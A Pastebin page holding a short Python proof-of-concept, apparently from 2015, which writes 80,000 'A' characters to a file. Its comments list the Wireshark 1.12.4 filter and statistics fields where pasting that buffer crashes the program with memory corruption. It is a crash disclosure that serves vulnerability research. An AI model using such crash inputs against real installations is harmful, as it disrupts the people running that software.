Advertisement
Guest User

Untitled

a guest
Apr 30th, 2015
994
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.86 KB | None | 0 0
  1.  
  2. #!/usr/bin/python
  3. # EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
  4. # AUTHOR: Avinash Kumar Thapa "-Acid"
  5. # Date of Testing: 26th April'2015
  6. # Vendor Homepage: http://www.wireshark.org
  7. # Tested On : Windows 8.1 Pro
  8. # Steps to Reproduce the Crash
  9. # Step 1: Create a File Using PoC
  10. # Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
  11. # Step 3: Click "Apply"
  12. # Some other places for the Crash are:
  13. # Statistics > IP Statistics then any of the field you can use.
  14. # Statistics > Packet Length > Paste the buffer in the field
  15. # Statistics > ANCP
  16. # Statistics > Collectd
  17. # Statistics > Compared
  18. # Statistis >
  19.  
  20.  
  21. buffer = "A"*80000
  22.  
  23. file = open("wireshark.txt","w")
  24. file.write(buffer)
  25. file.close()
  26.  
  27. print "POC Created by -Acid"
  28. print " Email: acid.exploit@gmail.com"
  29.  
  30. # 1337day.com [2015-05-01] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement